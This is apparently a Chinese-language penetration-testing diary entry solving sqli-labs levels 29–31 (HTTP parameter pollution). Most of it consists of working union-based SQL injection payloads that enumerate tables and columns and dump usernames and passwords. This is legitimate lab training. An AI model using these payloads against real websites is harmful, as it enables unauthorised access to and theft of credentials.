在职老D渗透日记day23:sqli-labs靶场通关(第29关-31关)http参数过滤
5.29.第29关 http参数过滤 '闭合
5.29.1.手动注入
(1)判断注入类型、注入点
'闭合(2)有回显,优先用联合查询注入,判读字段数
?id=1&id=2' order by 3 --+
?id=1&id=2' order by 4 --+
(3)判断回显位
?id=1&id=0' union select 7,8,9 --+ 
(4)查询数据库
?id=1&id=0' union select 1,database(),3 --+ 
(5)查询表名
?id=1&id=0' union select 7,8,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 
(6)查询字段名
?id=1&id=0' union select 7,8,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
(7)查询账号密码
?id=1&id=0' union select 7,8,group_concat(id,0x7e,username,0x3a,password) from users --+
waf好像没有生效,先照着跑跑
5.30.第30关 http参数过滤 "闭合
与29相同
5.31.第31关 http参数过滤 ")闭合
与29、30相同